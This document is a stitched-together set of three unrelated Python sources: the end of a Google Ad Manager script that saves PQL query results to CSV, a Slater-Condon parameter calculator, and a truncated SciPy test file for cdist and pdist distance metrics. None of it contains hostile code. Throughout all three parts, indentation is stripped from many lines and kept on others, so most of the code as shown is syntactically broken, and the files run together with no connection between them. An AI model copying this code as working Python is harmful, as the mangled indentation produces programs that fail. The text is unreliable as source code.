prefix='line_items_', suffix='.csv', mode='w', delete=False)
ad_units_file = tempfile.NamedTemporaryFile(
prefix='ad_units_', suffix='.csv', mode='w', delete=False)
line_items_pql_query = ('SELECT Name, Id, Status FROM Line_Item ORDER BY Id '
'ASC')
ad_units_pql_query = 'SELECT Name, Id FROM Ad_Unit ORDER BY Id ASC'
# Downloads the response from PQL select statement to the specified file
report_downloader.DownloadPqlResultToCsv(
line_items_pql_query, line_items_file)
report_downloader.DownloadPqlResultToCsv(
ad_units_pql_query, ad_units_file)
line_items_file.close()
ad_units_file.close()
  print('Saved line items to... %s' % line_items_file.name)
  print('Saved ad units to... %s' % ad_units_file.name)
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
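  # LoadFromStorage reads OAuth2 credentials and network settings from the
  # googleads.yaml file in the user's home directory by default.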
main(ad_manager_client)
|
#!/usr/bin/env python
import argparse
def main(options):
problem=options.subshell
uval=float(options.uval)
jval=float(options.jval)
if (problem=='s'):
F0=uval
print('F0=', F0)
elif (problem=='p'):
F0=uval
F2=5*jval
print('F0=', F0)
print('F2=', F2)
elif (problem=='d'):
F0=uval
F2=14.0/1.625*jval
F4=8.75/1.625*jval
print('F0=', F0)
print('F2=', F2)
print('F4=', F4)
elif (problem=='f'):
F0=uval
F2=6435.0/(286+195*0.668+250*0.494)*jval
F4=0.668*F2
F6=0.494*F2
print('F0=', F0)
print('F2=', F2)
print('F4=', F4)
print('F6=', F6)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='calculate Slater-Condon parameters from inputs of U and J')
    parser.add_argument('subshell', action='store', choices=['s', 'p', 'd', 'f'], help='subshell: one of s, p, d or f')
parser.add_argument('uval', action='store', help='U value in eV')
parser.add_argument('jval', action='store', help='J value in eV')
options = parser.parse_args()
main(options)
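# Worked example (values computed from the formulas above; d subshell,
# U=4.0 eV, J=0.9 eV):
#   F0 = 4.0
#   F2 = 14.0/1.625 * 0.9 ≈ 7.7538
#   F4 = 8.75/1.625 * 0.9 ≈ 4.8462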
|
#! /usr/bin/env python
#
# Author: Damian Eads
# Date: April 17, 2008
#
# Copyright (C) 2008 Damian Eads
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, print_function, absolute_import
import os.path
from scipy._lib.six import xrange, u
import numpy as np
from numpy.linalg import norm
from numpy.testing import (verbose, TestCase, run_module_suite, assert_,
assert_raises, assert_array_equal, assert_equal, assert_almost_equal,
assert_allclose)
from scipy.spatial.distance import (squareform, pdist, cdist, matching,
jaccard, dice, sokalsneath, rogerstanimoto, russellrao, yule,
num_obs_y, num_obs_dm, is_valid_dm, is_valid_y, minkowski, wminkowski,
euclidean, sqeuclidean, cosine, correlation, hamming, mahalanobis,
canberra, braycurtis, sokalmichener, _validate_vector)
_filenames = ["iris.txt",
"cdist-X1.txt",
"cdist-X2.txt",
"pdist-hamming-ml.txt",
"pdist-boolean-inp.txt",
"pdist-jaccard-ml.txt",
"pdist-cityblock-ml-iris.txt",
"pdist-minkowski-3.2-ml-iris.txt",
"pdist-cityblock-ml.txt",
"pdist-correlation-ml-iris.txt",
"pdist-minkowski-5.8-ml-iris.txt",
"pdist-correlation-ml.txt",
"pdist-minkowski-3.2-ml.txt",
"pdist-cosine-ml-iris.txt",
"pdist-seuclidean-ml-iris.txt",
"pdist-cosine-ml.txt",
"pdist-seuclidean-ml.txt",
"pdist-double-inp.txt",
"pdist-spearman-ml.txt",
"pdist-euclidean-ml.txt",
"pdist-euclidean-ml-iris.txt",
"pdist-chebychev-ml.txt",
"pdist-chebychev-ml-iris.txt",
"random-bool-data.txt"]
_tdist = np.array([[0, 662, 877, 255, 412, 996],
[662, 0, 295, 468, 268, 400],
[877, 295, 0, 754, 564, 138],
[255, 468, 754, 0, 219, 869],
[412, 268, 564, 219, 0, 669],
[996, 400, 138, 869, 669, 0]], dtype='double')
_ytdist = squareform(_tdist)
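# squareform here collapses the symmetric 6x6 matrix into its condensed form:
# the n*(n-1)/2 = 15 upper-triangle entries read row by row, so
# _ytdist[:5] == [662, 877, 255, 412, 996] (the first row above the diagonal).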
# A hashmap of expected output arrays for the tests. These arrays
# come from a list of text files, which are read prior to testing.
# Each test loads inputs and outputs from this dictionary.
eo = {}
def load_testing_files():
    for fn in _filenames:
        name = fn.replace(".txt", "").replace("-ml", "")
        fqfn = os.path.join(os.path.dirname(__file__), 'data', fn)
        with open(fqfn) as fp:
            eo[name] = np.loadtxt(fp)
eo['pdist-boolean-inp'] = np.bool_(eo['pdist-boolean-inp'])
load_testing_files()
class TestCdist(TestCase):
def test_cdist_euclidean_random(self):
eps = 1e-07
# Get the data: the input matrix and the right output.
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'euclidean')
Y2 = cdist(X1, X2, 'test_euclidean')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_euclidean_random_unicode(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, u('euclidean'))
Y2 = cdist(X1, X2, u('test_euclidean'))
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_sqeuclidean_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'sqeuclidean')
Y2 = cdist(X1, X2, 'test_sqeuclidean')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_cityblock_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'cityblock')
Y2 = cdist(X1, X2, 'test_cityblock')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_hamming_double_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'hamming')
Y2 = cdist(X1, X2, 'test_hamming')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_hamming_bool_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'hamming')
Y2 = cdist(X1, X2, 'test_hamming')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_jaccard_double_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'jaccard')
Y2 = cdist(X1, X2, 'test_jaccard')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_jaccard_bool_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'jaccard')
Y2 = cdist(X1, X2, 'test_jaccard')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_chebychev_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'chebychev')
Y2 = cdist(X1, X2, 'test_chebychev')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_minkowski_random_p3d8(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'minkowski', p=3.8)
Y2 = cdist(X1, X2, 'test_minkowski', p=3.8)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_minkowski_random_p4d6(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'minkowski', p=4.6)
Y2 = cdist(X1, X2, 'test_minkowski', p=4.6)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_minkowski_random_p1d23(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'minkowski', p=1.23)
Y2 = cdist(X1, X2, 'test_minkowski', p=1.23)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_wminkowski_random_p3d8(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
w = 1.0 / X1.std(axis=0)
Y1 = cdist(X1, X2, 'wminkowski', p=3.8, w=w)
Y2 = cdist(X1, X2, 'test_wminkowski', p=3.8, w=w)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_wminkowski_int_weights(self):
# regression test when using integer weights
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
w = np.arange(X1.shape[1])
Y1 = cdist(X1, X2, 'wminkowski', p=3.8, w=w)
Y2 = cdist(X1, X2, 'test_wminkowski', p=3.8, w=w)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_wminkowski_random_p4d6(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
w = 1.0 / X1.std(axis=0)
Y1 = cdist(X1, X2, 'wminkowski', p=4.6, w=w)
Y2 = cdist(X1, X2, 'test_wminkowski', p=4.6, w=w)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_wminkowski_random_p1d23(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
w = 1.0 / X1.std(axis=0)
Y1 = cdist(X1, X2, 'wminkowski', p=1.23, w=w)
Y2 = cdist(X1, X2, 'test_wminkowski', p=1.23, w=w)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_seuclidean_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'seuclidean')
Y2 = cdist(X1, X2, 'test_seuclidean')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_cosine_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'cosine')
# Naive implementation
def norms(X):
# NumPy 1.7: np.linalg.norm(X, axis=1).reshape(-1, 1)
return np.asarray([np.linalg.norm(row)
for row in X]).reshape(-1, 1)
Y2 = 1 - np.dot((X1 / norms(X1)), (X2 / norms(X2)).T)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_correlation_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'correlation')
Y2 = cdist(X1, X2, 'test_correlation')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_mahalanobis_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'mahalanobis')
Y2 = cdist(X1, X2, 'test_mahalanobis')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_canberra_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'canberra')
Y2 = cdist(X1, X2, 'test_canberra')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_braycurtis_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'braycurtis')
Y2 = cdist(X1, X2, 'test_braycurtis')
if verbose > 2:
print(Y1, Y2)
print((Y1-Y2).max())
_assert_within_tol(Y1, Y2, eps)
def test_cdist_yule_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'yule')
Y2 = cdist(X1, X2, 'test_yule')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_matching_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'matching')
Y2 = cdist(X1, X2, 'test_matching')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_kulsinski_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'kulsinski')
Y2 = cdist(X1, X2, 'test_kulsinski')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_dice_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'dice')
Y2 = cdist(X1, X2, 'test_dice')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_rogerstanimoto_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'rogerstanimoto')
Y2 = cdist(X1, X2, 'test_rogerstanimoto')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_russellrao_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'russellrao')
Y2 = cdist(X1, X2, 'test_russellrao')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_sokalmichener_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'sokalmichener')
Y2 = cdist(X1, X2, 'test_sokalmichener')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_sokalsneath_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'sokalsneath')
Y2 = cdist(X1, X2, 'test_sokalsneath')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
class TestPdist(TestCase):
def test_pdist_euclidean_random(self):
eps = 1e-07
X = eo['pdist-double-inp']
Y_right = eo['pdist-euclidean']
Y_test1 = pdist(X, 'euclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_euclidean_random_u(self):
eps = 1e-07
X = eo['pdist-double-inp']
Y_right = eo['pdist-euclidean']
Y_test1 = pdist(X, u('euclidean'))
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_euclidean_random_float32(self):
eps = 1e-07
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-euclidean']
Y_test1 = pdist(X, 'euclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_euclidean_random_nonC(self):
eps = 1e-07
X = eo['pdist-double-inp']
Y_right = eo['pdist-euclidean']
Y_test2 = pdist(X, 'test_euclidean')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_euclidean_iris_double(self):
eps = 1e-07
X = eo['iris']
Y_right = eo['pdist-euclidean-iris']
Y_test1 = pdist(X, 'euclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_euclidean_iris_float32(self):
eps = 1e-06
X = np.float32(eo['iris'])
Y_right = eo['pdist-euclidean-iris']
Y_test1 = pdist(X, 'euclidean')
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_euclidean_iris_nonC(self):
# Test pdist(X, 'test_euclidean') [the non-C implementation] on the
# Iris data set.
eps = 1e-07
X = eo['iris']
Y_right = eo['pdist-euclidean-iris']
Y_test2 = pdist(X, 'test_euclidean')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_seuclidean_random(self):
eps = 1e-05
X = eo['pdist-double-inp']
Y_right = eo['pdist-seuclidean']
Y_test1 = pdist(X, 'seuclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_seuclidean_random_float32(self):
eps = 1e-05
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-seuclidean']
Y_test1 = pdist(X, 'seuclidean')
_assert_within_tol(Y_test1, Y_right, eps)
    def test_pdist_seuclidean_random_nonC(self):
        # Test pdist(X, 'test_seuclidean') [the non-C implementation]
        eps = 1e-05
        X = eo['pdist-double-inp']
        Y_right = eo['pdist-seuclidean']
        Y_test2 = pdist(X, 'test_seuclidean')
        _assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_seuclidean_iris(self):
eps = 1e-05
X = eo['iris']
Y_right = eo['pdist-seuclidean-iris']
Y_test1 = pdist(X, 'seuclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_seuclidean_iris_float32(self):
# Tests pdist(X, 'seuclidean') on the Iris data set (float32).
eps = 1e-05
X = np.float32(eo['iris'])
Y_right = eo['pdist-seuclidean-iris']
Y_test1 = pdist(X, 'seuclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_seuclidean_iris_nonC(self):
# Test pdist(X, 'test_seuclidean') [the non-C implementation] on the
# Iris data set.
eps = 1e-05
X = eo['iris']
Y_right = eo['pdist-seuclidean-iris']
        Y_test2 = pdist(X, 'test_seuclidean')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_cosine_random(self):
eps = 1e-08
X = eo['pdist-double-inp']
Y_right = eo['pdist-cosine']
Y_test1 = pdist(X, 'cosine')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_cosine_random_float32(self):
eps = 1e-08
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-cosine']
Y_test1 = pdist(X, 'cosine')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_cosine_random_nonC(self):
# Test pdist(X, 'test_cosine') [the non-C implementation]
eps = 1e-08
X = eo['pdist-double-inp']
Y_right = eo['pdist-cosine']
Y_test2 = pdist(X, 'test_cosine')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_cosine_iris(self):
eps = 1e-08
X = eo['iris']
Y_right = eo['pdist-cosine-iris']
Y_test1 = pdist(X, 'cosine')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_cosine_iris_float32(self):
eps = 1e-07
X = np.float32(eo['iris'])
Y_right = eo['pdist-cosine-iris']
Y_test1 = pdist(X, 'cosine')
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_cosine_iris_nonC(self):
eps = 1e-08
X = eo['iris']
Y_right = eo['pdist-cosine-iris']
Y_test2 = pdist(X, 'test_cosine')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_cityblock_random(self):
eps = 1e-06
X = eo['pdist-double-inp']
Y_right = eo['pdist-cityblock']
Y_test1 = pdist(X, 'cityblock')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_cityblock_random_float32(self):
eps = 1e-06
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-cityblock']
Y_test1 = pdist(X, 'cityblock')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_cityblock_random_nonC(self):
eps = 1e-06
X = eo['pdist-double-inp']
Y_right = eo['pdist-cityblock']
Y_test2 = pdist(X, 'test_cityblock')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_cityblock_iris(self):
eps = 1e-14
X = eo['iris']
Y_right = eo['pdist-cityblock-iris']
Y_test1 = pdist(X, 'cityblock')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_cityblock_iris_float32(self):
eps = 1e-06
X = np.float32(eo['iris'])
Y_right = eo['pdist-cityblock-iris']
Y_test1 = pdist(X, 'cityblock')
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_cityblock_iris_nonC(self):
# Test pdist(X, 'test_cityblock') [the non-C implementation] on the
# Iris data set.
eps = 1e-14
X = eo['iris']
Y_right = eo['pdist-cityblock-iris']
Y_test2 = pdist(X, 'test_cityblock')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_correlation_random(self):
eps = 1e-07
X = eo['pdist-double-inp']
Y_right = eo['pdist-correlation']
Y_test1 = pdist(X, 'correlation')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_correlation_random_float32(self):
eps = 1e-07
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-correlation']
Y_test1 = pdist(X, 'correlation')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_correlation_random_nonC(self):
eps = 1e-07
X = eo['pdist-double-inp']
Y_right = eo['pdist-correlation']
Y_test2 = pdist(X, 'test_correlation')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_correlation_iris(self):
eps = 1e-08
X = eo['iris']
Y_right = eo['pdist-correlation-iris']
Y_test1 = pdist(X, 'correlation')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_correlation_iris_float32(self):
eps = 1e-07
X = eo['iris']
Y_right = np.float32(eo['pdist-correlation-iris'])
Y_test1 = pdist(X, 'correlation')
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_correlation_iris_nonC(self):
eps = 1e-08
X = eo['iris']
Y_right = eo['pdist-correlation-iris']
Y_test2 = pdist(X, 'test_correlation')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_minkowski_random(self):
eps = 1e-05
X = eo['pdist-double-inp']
Y_right = eo['pdist-minkowski-3.2']
Y_test1 = pdist(X, 'minkowski', 3.2)
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_minkowski_random_float32(self):
eps = 1e-05
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-minkowski-3.2']
Y_test1 = pdist(X, 'minkowski', 3.2)
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_minkowski_random_nonC(self):
eps = 1e-05
X = eo['pdist-double-inp']
Y_right = eo['pdist-minkowski-3.2']
Y_test2 = pdist(X, 'test_minkowski', 3.2)
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_minkowski_3_2_iris(self):
eps = 1e-07
X = eo['iris']
Y_right = eo['pdist-minkowski-3.2-iris']
Y_test1 = pdist(X, 'minkowski', 3.2)
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_minkowski_3_2_iris_float32(self):
eps = 1e-06
X = np.float32(eo['iris'])
Y_right = eo['pdist-minkowski-3.2-iris']
Y_test1 = pdist(X, 'minkowski', 3.2)
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_minkowski_3_2_iris_nonC(self):
eps = 1e-07
X = eo['iris']
Y_right = eo['pdist-minkowski-3.2-iris']
Y_test2 = pdist(X, 'test_minkowski', 3.2)
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_minkowski_5_8_iris(self):
eps = 1e-07
X = eo['iris']
Y_right = eo['pdist-minkowski-5.8-iris']
Y_test1 = pdist(X, 'minkowski', 5.8)
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_minkowski_5_8_iris_float32(self):
eps = 1e-06
X = np.float32(eo['iris'])
Y_right = eo['pdist-minkowski-5.8-iris']
Y_test1 = pdist(X, 'minkowski', 5.8)
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_minkowski_5_8_iris_nonC(self):
eps = 1e-07
X = eo['iris']
Y_right = eo['pdist-minkowski-5.8-iris']
Y_test2 = pdist(X, 'test_minkowski', 5.8)
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_wminkowski(self):
x = np.array([[0.0, 0.0, 0.0],
[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[1.0, 1.0, 1.0]])
p2_expected = [1.0, 1.0, np.sqrt(3),
np.sqrt(2), np.sqrt(2),
np.sqrt(2)]
p1_expected = [0.5, 1.0, 3.5,
1.5, 3.0,
2.5]
dist = pdist(x, metric=wminkowski, w=[1.0, 1.0, 1.0])
assert_allclose(dist, p2_expected, rtol=1e-14)
dist = pdist(x, metric=wminkowski, w=[0.5, 1.0, 2.0], p=1)
assert_allclose(dist, p1_expected, rtol=1e-14)
dist = pdist(x, metric='wminkowski', w=[1.0, 1.0, 1.0])
assert_allclose(dist, p2_expected, rtol=1e-14)
dist = pdist(x, metric='wminkowski', w=[0.5, 1.0, 2.0], p=1)
assert_allclose(dist, p1_expected, rtol=1e-14)
def test_pdist_wminkowski_int_weights(self):
# regression test for int weights
x = np.array([[0.0, 0.0, 0.0],
[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[1.0, 1.0, 1.0]])
dist1 = pdist(x, metric='wminkowski', w=np.arange(3), p=1)
dist2 = pdist(x, metric='wminkowski', w=[0., 1., 2.], p=1)
assert_allclose(dist1, dist2, rtol=1e-14)
def test_pdist_hamming_random(self):
eps = 1e-07
X = eo['pdist-boolean-inp']
Y_right = eo['pdist-hamming']
Y_test1 = pdist(X, 'hamming')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_hamming_random_float32(self):
eps = 1e-07
X = np.float32(eo['pdist-boolean-inp'])
Y_right = eo['pdist-hamming']
Y_test1 = pdist(X, 'hamming')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_hamming_random_nonC(self):
eps = 1e-07
X = eo['pdist-boolean-inp']
Y_right = eo['pdist-hamming']
Y_test2 = pdist(X, 'test_hamming')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_dhamming_random(self):
eps = 1e-07
X = np.float64(eo['pdist-boolean-inp'])
Y_right = eo['pdist-hamming']
Y_test1 = pdist(X, 'hamming')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_dhamming_random_float32(self):
eps = 1e-07
X = np.float32(eo['pdist-boolean-inp'])
Y_right = eo['pdist-hamming']
Y_test1 = pdist(X, 'hamming')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_dhamming_random_nonC(self):
eps = 1e-07
X = np.float64(eo['pdist-boolean-inp'])
Y_right = eo['pdist-hamming']
Y_test2 = pdist(X, 'test_hamming')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_jaccard_random(self):
eps = 1e-08
X = eo['pdist-boolean-inp']
Y_right = eo['pdist-jaccard']
Y_test1 = pdist(X, 'jaccard')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_jaccard_random_float32(self):
eps = 1e-08
X = np.float32(eo['pdist-boolean-inp'])
Y_right = eo['pdist-jaccard']
Y_test1 = pdist(X, 'jaccard')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_jaccard_random_nonC(self):
eps = 1e-08
X = eo['pdist-boolean-inp']
Y_right = eo['pdist-jaccard']
Y_test2 = pdist(X, 'test_jaccard')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_djaccard_random(self):
eps = 1e-08
X = np.float64(eo['pdist-boolean-inp'])
Y_right = eo['pdist-jaccard']
Y_test1 = pdist(X, 'jaccard')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_djaccard_random_float32(self):
eps = 1e-08
X = np.float32(eo['pdist-boolean-inp'])
Y_right = eo['pdist-jaccard']
Y_test1 = pdist(X, 'jaccard')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_djaccard_random_nonC(self):
eps = 1e-08
X = np.float64(eo['pdist-boolean-inp'])
Y_right = eo['pdist-jaccard']
Y_test2 = pdist(X, 'test_jaccard')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_chebychev_random(self):
eps = 1e-08
X = eo['pdist-double-inp']
Y_right = eo['pdist-chebychev']
Y_test1 = pdist(X, 'chebychev')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_chebychev_random_float32(self):
eps = 1e-07
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-chebychev']
Y_test1 = pdist(X, 'chebychev')
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_chebychev_random_nonC(self):
eps = 1e-08
X = eo['pdist-double-inp']
Y_right = eo['pdist-chebychev']
Y_test2 = pdist(X, 'test_chebychev')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_chebychev_iris(self):
eps = 1e-15
X = eo['iris']
Y_right = eo['pdist-chebychev-iris']
Y_test1 = pdist(X, 'chebychev')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_chebychev_iris_float32(self):
eps = 1e-06
X = np.float32(eo['iris'])
Y_right = eo['pdist-chebychev-iris']
Y_test1 = pdist(X, 'chebychev')
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_chebychev_iris_nonC(self):
eps = 1e-15
X = eo['iris']
Y_right = eo['pdist-chebychev-iris']
Y_test2 = pdist(X, 'test_chebychev')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_matching_mtica1(self):
# Test matching(*,*) with mtica example #1 (nums).
m = matching(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = matching(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
assert_allclose(m, 0.6, rtol=0, atol=1e-10)
